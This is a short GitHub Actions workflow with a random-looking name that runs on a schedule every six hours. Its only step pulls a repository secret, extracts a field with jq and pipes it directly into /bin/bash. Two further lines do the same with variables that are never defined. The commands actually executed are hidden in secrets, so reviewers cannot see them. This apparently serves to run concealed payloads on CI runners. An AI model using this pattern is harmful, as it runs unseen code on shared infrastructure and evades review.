name: yingongfei2389

on:
  workflow_dispatch:
  schedule:
    - cron: '17 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yingongfei2389
        env:
          too5: ${{ secrets.too5 }}
        run: |
          echo $too5 | jq -r .lr54 | /bin/bash
          echo $zmew3946 | jq -r .rvbh56 | /bin/bash
          echo $fg55063 | jq -r .vyaq8115 | /bin/bash

